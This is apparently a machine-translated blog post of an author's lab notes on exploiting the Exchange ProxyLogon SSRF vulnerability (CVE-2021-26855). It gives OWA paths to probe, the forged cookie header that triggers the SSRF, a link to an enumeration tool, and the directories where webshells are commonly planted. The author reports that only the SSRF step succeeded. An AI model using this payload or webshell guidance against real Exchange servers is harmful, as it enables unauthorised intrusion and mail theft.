ProxyLogon Utilization method


Some of the words

The way of exploiting loopholes has come out long ago, mainly because there are more pits in the process of using one time, and the final failure, just have time to do things over and over again, and repeat learning here

In the process, FQDN and OABID are the main pits encountered by the younger brother. If the older brothers have better articles, they can push the younger brother to read

Introduction

Vulnerability Description:
Exchange Server is an E-mail service component of Microsoft. It is a messaging and collaboration system. On March 3, 2021, Microsoft officially released a Security update for Microsoft Exchange, which disclosed several high-risk and critical vulnerabilities, including: In CVE-2021-26855 Exchange SSRF vulnerability, an attacker can directly construct malicious requests, initiate arbitrary HTTP requests as an Exchange server, scan the Intranet, and obtain Exchange user information. The vulnerability exploits no identity authentication

Affected version:
Microsoft Exchange 2013
Microsoft Exchange 2016
Microsoft Exchange 2019
Microsoft Exchange 2010

Local environment

Note that there are still some problems with the built environment. After the current test, only the SSRF succeeds, and the subsequent getshell environment needs to be changed

I don't know if there is no getshell because of my brother's operation problem. If my brother can succeed, please tell my brother

I am using server2016+exchange2016,the following

New machine installation ex16 will report error, as follows, search the relevant dependence on self-installation, basic are very simple, also do not have to search what, what is missing under what

Actual use

DNSlog

The URL that tests can use:
/owa/auth/qqqqq.js
/owa/auth/Current/1.js
/owa/auth/Current/themes/resources/logon.css
/owa/auth/Current/themes/resources/.....

set cookie:X -AnonResource=true; X-AnonResource-Backend=XXXXXX/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

You can use hackbar like this:

DNS The following command output is displayed

Mail the enumeration

You can use this:
https://github.com/charlottelatest/CVE-2021-26855

After many tests, it is found that sometimes the target can not be exploited successfully despite the existence of loopholes!!

In addition, the local 2016 environment is still unable to getshell!!

The OABID needs to be modified

Visit WebShell below

Regular Webshell upload path (easy to turn over directory)

\inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or sub folders)
\<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx)
\<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file or modified file that is not part of a standard install)
\<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\<any aspx file in this folder or subfolders>
\<exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\<any aspx file in this folder or subfolders>
More Principle Reference
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265
https://mp.weixin.qq.com/s/sGkYS4BSM2ER3ubR6G-xhA

Author: Yangsir
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !
  TOC